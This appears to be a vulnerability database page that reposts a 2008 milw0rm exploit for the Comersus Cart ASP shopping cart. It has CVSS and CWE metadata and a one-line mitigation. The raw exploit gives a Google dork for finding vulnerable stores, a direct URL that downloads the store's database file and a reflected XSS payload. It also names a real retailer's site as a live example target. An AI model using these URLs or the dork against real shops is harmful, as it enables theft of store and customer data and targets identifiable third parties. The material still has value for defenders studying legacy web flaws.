Comersus Cart Multiple Exploits (XSS + remote database disclosure)

vendor:

Comersus Cart

by:

blackbeard-sql@hotmail.fr

7.5

CVSS

HIGH

XSS + remote database disclosure

79, 200

CWE

Product Name: Comersus Cart

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Comersus Cart Multiple Exploits (XSS + remote database disclosure)

In simple words, an attacker can exploit the vulnerability by sending a malicious URL to the victim. The malicious URL contains a malicious script which is executed in the victim's browser. The malicious script can be used to steal sensitive information from the victim's browser or to execute malicious code on the victim's machine.

Mitigation:

The vendor should implement proper input validation and sanitization to prevent malicious scripts from being executed.

Source

Exploit-DB raw data:

000000  00000     0000    0000  000  00 000000  0000000   0000  000000  00000
 0    0   0      0    0  0    0  0   0   0    0  0    0  0    0  0    0  0   0
 0    0   0     0  00 0 0        0  0    0    0  0      0  00 0  0    0  0    0
 0    0   0     0 0 0 0 0        0  0    0    0  0  0   0 0 0 0  0    0  0    0
 00000    0     0 0 0 0 0        0 0     00000   0000   0 0 0 0  00000   0    0
 0    0   0     0 0 0 0 0        000     0    0  0  0   0 0 0 0  0  0    0    0
 0    0   0     0  000  0        0  0    0    0  0      0  000   0  0    0    0
 0    0   0   0  0       0    0  0   0   0    0  0    0  0       0   0   0   0
000000  0000000   000     0000  000  00 000000  0000000   000   000  00 00000



[+] Script               : Comersus Cart

[+] Exploit Type         : Multiple Exploits (XSS + remote database disclosure)

[+] Script's Homepage    : http://comersus.com

[+] Google Dork          : inurl:.asp?   Powered by Comersus ASP Shopping Cart

[+] Contact              : blackbeard-sql@hotmail.fr


--//--> Exploit : 

1) Remote Database Disclure :

http://[website]/[script]/database/commersus.mdb


2) Remote XSS exploit : 

In simple words :

http://[website]/[script]/comersus_message.asp?message=<script>alert('Bl@ckbe@rD is not dead yet')</script>[Peace xD ]


[Peace xD ]


//Example for str0ke : 

https://www.tarkentonsports.com/Comersus/database/comersus.mdb

https://www.tarkentonsports.com/Comersus/store/comersus_message.asp?message=%3Cscript%3Ealert(%27Bl@ckbe@rD%20is%20not%20dead%20yet%27)%3C/script%3E[Peace%20xD%20]

# milw0rm.com [2008-11-27]